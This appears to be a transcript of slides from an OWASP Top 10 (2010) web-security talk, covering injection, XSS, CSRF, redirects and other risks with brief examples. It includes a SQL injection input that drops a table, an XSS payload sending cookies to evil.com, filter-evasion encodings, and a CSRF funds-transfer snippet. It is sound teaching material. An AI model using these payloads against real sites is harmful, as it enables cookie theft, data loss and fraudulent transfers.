OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources.
Post on 04-Jan-2016
225 Views
Preview:
Transcript
OWASP
OWASP top 10 - Agenda
Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources
OWASP
The OWASP Guide
OWASP
ThreatAgent
AttackVector
Weakness Prevalence
Weakness Detectability
Technical Impact
Business Impact
?Easy Widespread Easy Severe
?Average Common Average Moderate
Difficult Uncommon Difficult Minor
OWASP
Warning
Risk analysis Insiders
Architecture Modular Clarity
SDLC Knowledge Predictability
OWASP
Top 10 - 2010
1. Injection 2. Cross site scripting (XSS) 3. Broken authentication and session
management 4. Insecure direct object reference 5. Cross site request forgery (CSRF) 6. Security missconfiguration 7. Insecure cryptograpic storage 8. Failure to restrict URL access 9. Insufficient transoport layer protection 10.Unvalidated redirects and forwards
OWASP
A1 – Injection
Client ApplDB
Shell
Pgm CPU
OWASP
A1 – Injection
String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") +"'";
id="foo';DROP accnts;--"
SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';
id="foo"
SELECT * FROM accnts WHERE ID='foo';
OWASP
A2 - Cross site scripting (XSS)
Browser
Browser
Appl DB
OWASP
A2 - Cross site scripting (XSS)
(String) page += "<input name='cc' type='TEXT' value='" + request.getParameter("CC") + "'>";
CC=123456789"><script>window.location=http://evil.com?x=document.cookie</script>
<input name='cc' value='123456789“><script> window.location=http://evil.com?x=document.cookie </script>'>
CC=“123456789"
<input name='cc' value='123456789'>
OWASP
A2 - Cross site scripting (XSS)
<<�\x3c\x3C\u003c\u003C
<%3C<<<<<<<
<img src=http://site.com onmoseover= <body onload= <IMG SRC=jAvascript:alert('test2')>
OWASP
A3 - Broken authentication and session mngmnt
Unpredictable passwords, sessions-ID, security-questions
No sessions-id/credentials i URL Avoid session-fixation Time out of sessions & logout buttons Different sessions id outside/inside TLS No clear text passwords
OWASP
A4 - Insecure direct object references
<SELECT name=period> <OPTION>2010q1</OPTION> <OPTION>2011q2</OPTION></SELECT>
period=2011q3
period=2011q2
OWASP
A5 - Cross-site request forgery (CSRF)
<img src="http://example.com/transferFunds?amount=1500 &destinationAccount=attackersAcct#“width="0" height="0" />
<body onload="document.forms[0].submit()"> <form method="POST" action="https://bank.com/fn"> <input type="hidden" name="sp" value="8109"/> </form>
OWASP
A6 - Security missconfiguration
Patching OS Application Frameworks / libraries
Disable unnecessary services Stack traces Configuration
OWASP
A7 - Insecure cryptographig storage
Keep track on sensitive data Password one-way-hashed & salted Password/Key management
TLS key pass phrase M2M lösenord (obfuscation)
OWASP
A8 - Failure to restrict URL access
/user/getAccounts/admin/getAccounts
OWASP
A9 - Insufficient transport layer protection
Use SSL/TLS No mixed content Use secure cookies
Example FireSheep exploits poor solutions
OWASP
A10 - Unvalidated redirects and forwards
http://www.vuln.com/redir.asp?=http://www.links.com
http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
OWASP
OWASP resurser
OWASP Secure Software Contract Annex OWASP Developer’s Guide OWASP Enterprise Security API (ESAPI) OWASP Software Assurance Maturity Mode
l (SAMM)
OWASP WebGoat
top related